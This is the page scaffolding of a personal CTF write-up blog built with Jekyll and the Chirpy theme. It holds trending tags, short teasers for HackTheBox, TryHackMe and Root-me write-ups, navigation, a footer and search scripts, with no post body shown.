  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  
    <div id="access-tags">
      <span>Trending Tags</span>
      <div class="d-flex flex-wrap mt-3 mb-1 mr-3">

      
        
        <a class="post-tag" href="/tags/costom-exploitation/">costom exploitation</a>
      
        
        <a class="post-tag" href="/tags/cracking/">cracking</a>
      
        
        <a class="post-tag" href="/tags/hashcat/">hashcat</a>
      
        
        <a class="post-tag" href="/tags/nmap/">nmap</a>
      
        
        <a class="post-tag" href="/tags/burpsuite/">burpsuite</a>
      
        
        <a class="post-tag" href="/tags/cryptography/">Cryptography</a>
      
        
        <a class="post-tag" href="/tags/easy-box/">easy-box</a>
      
        
        <a class="post-tag" href="/tags/enumeration/">enumeration</a>
      
        
        <a class="post-tag" href="/tags/ghidra/">ghidra</a>
      
        
        <a class="post-tag" href="/tags/gobuster/">gobuster</a>
      

      </div>
    </div>
  
  </div> <!-- .access -->

  
    <!-- BS-toc.js will be loaded at medium priority -->
    <script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>
    <div id="toc-wrapper" class="pl-0 pr-4 mb-5">
      <span class="pl-3 pt-2 mb-2">Contents</span>
      <nav id="toc" data-toggle="toc"></nav>
    </div>
  

</div> <!-- #panel-wrapper -->


</div> <!-- .row -->

<div class="row">
  <div class="col-12 col-lg-11 col-xl-8">
    <div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4">

    <!--
 Recommend the other 3 posts according to the tags and categories of the current post,
 if the number is not enough, use the other latest posts to supplement.
-->

<!-- The total size of related posts  -->


<!-- An random integer that bigger than 0  -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy}  -->








  

  
    
  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  


  

  

  

  

  

  








<!-- Fill with the other newlest posts  -->






  <div id="related-posts" class="mt-5 mb-2 mb-sm-4">
    <h3 class="pt-2 mt-1 mb-4 ml-1"
      data-toc-skip>Further Reading</h3>
    <div class="card-deck mb-4">
    
      
      
      <div class="card">
        <a href="/posts/writeup-hackthebox-delivery/">
          <div class="card-body">
            <!--
  Date format snippet
-->





<span class="timeago small"
  >

  
  

  
    Feb  9, 2020
  

  <i class="unloaded">2020-02-09T00:00:00+07:00</i>

</span>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox Delivery</h3>
            <div class="text-muted small">
              <p>
                





                

Nmap
As always we will start with nmap to scan for open ports and services:



As we can see, we have 2 port open like ssh and webserver. Look at port 80 on browser



Then you must see the sourc...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/writeup-tryhackme-classic-passwd/">
          <div class="card-body">
            <!--
  Date format snippet
-->





<span class="timeago small"
  >

  
  

  
    Feb  9, 2020
  

  <i class="unloaded">2020-02-09T00:00:00+07:00</i>

</span>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Tryhackme Classic Passwd</h3>
            <div class="text-muted small">
              <p>
                





                

Introduction
in this room you will train your skills in reverse engineer and bypass login. you can see room right here : https://tryhackme.com/room/classicpasswd

radare2

We can use radare2 to o...
              </p>
            </div>
          </div>
        </a>
      </div>
    
      
      
      <div class="card">
        <a href="/posts/writeup-root-me-Cryptography/">
          <div class="card-body">
            <!--
  Date format snippet
-->





<span class="timeago small"
  >

  
  

  
    Feb  8, 2020
  

  <i class="unloaded">2020-02-08T00:00:00+07:00</i>

</span>

            <h3 class="pt-0 mt-1 mb-3" data-toc-skip>Root-me Cryptography</h3>
            <div class="text-muted small">
              <p>
                





                Encoding - ASCII
In GNU/linux, you can use the xxd command :
$ echo "4C6520666C6167206465206365206368616C6C656E6765206573743A203261633337363438316165353436636436383964356239313237356433323465" | xx...
              </p>
            </div>
          </div>
        </a>
      </div>
    
    </div> <!-- .card-deck -->
  </div> <!-- #related-posts -->



    <!--
  Navigation buttons at the bottom of the post.
-->

<div class="post-navigation d-flex justify-content-between">
  
  <a href="/posts/writeup-tryhackme-classic-passwd/" class="btn btn-outline-primary"
    prompt="Older">
    <p>Tryhackme Classic Passwd</p>
  </a>
  

  
  <span class="btn btn-outline-primary disabled"
    prompt="Newer">
    <p>-</p>
  </span>
  

</div>


    

    </div> <!-- #post-extend-wrapper -->

  </div> <!-- .col-* -->

</div> <!-- .row -->



  <!--
  image lazy load: https://github.com/ApoorvSaxena/lozad.js
-->
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script>

<script type="text/javascript">
  const imgs = document.querySelectorAll('.post-content img');
  const observer = lozad(imgs);
  observer.observe();
</script>




        <!--
  The Footer
-->

<footer class="d-flex w-100 justify-content-center">
  <div class="d-flex justify-content-between align-items-center">
    <div class="footer-left">
      <p class="mb-0">
        © 2021
        <a href="https://twitter.com/username">Razor</a>.
        
        <span data-toggle="tooltip" data-placement="top"
          title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span>
        
      </p>
    </div>

    <div class="footer-right">
      <p class="mb-0">
        Powered by
        <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>
        with
        <a href="https://github.com/cotes2020/jekyll-theme-chirpy"
          target="_blank" rel="noopener">Chirpy</a>
        theme.
      </p>
    </div>

  </div> <!-- div.d-flex -->
</footer>


      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-xl-11 post-content">
    <div id="search-hints">
      <h4 class="text-muted mb-4">Trending Tags</h4>

      















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



      
        
        <a class="post-tag" href="/tags/costom-exploitation/">costom exploitation</a>
      
        
        <a class="post-tag" href="/tags/cracking/">cracking</a>
      
        
        <a class="post-tag" href="/tags/hashcat/">hashcat</a>
      
        
        <a class="post-tag" href="/tags/nmap/">nmap</a>
      
        
        <a class="post-tag" href="/tags/burpsuite/">burpsuite</a>
      
        
        <a class="post-tag" href="/tags/cryptography/">Cryptography</a>
      
        
        <a class="post-tag" href="/tags/easy-box/">easy box</a>
      
        
        <a class="post-tag" href="/tags/enumeration/">enumeration</a>
      
        
        <a class="post-tag" href="/tags/ghidra/">ghidra</a>
      
        
        <a class="post-tag" href="/tags/gobuster/">gobuster</a>
      

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    <div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div>    <div><i class="fa fa-tag fa-fw"></i>{tags}</div>  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>'
});
</script>


  </body>

</html>

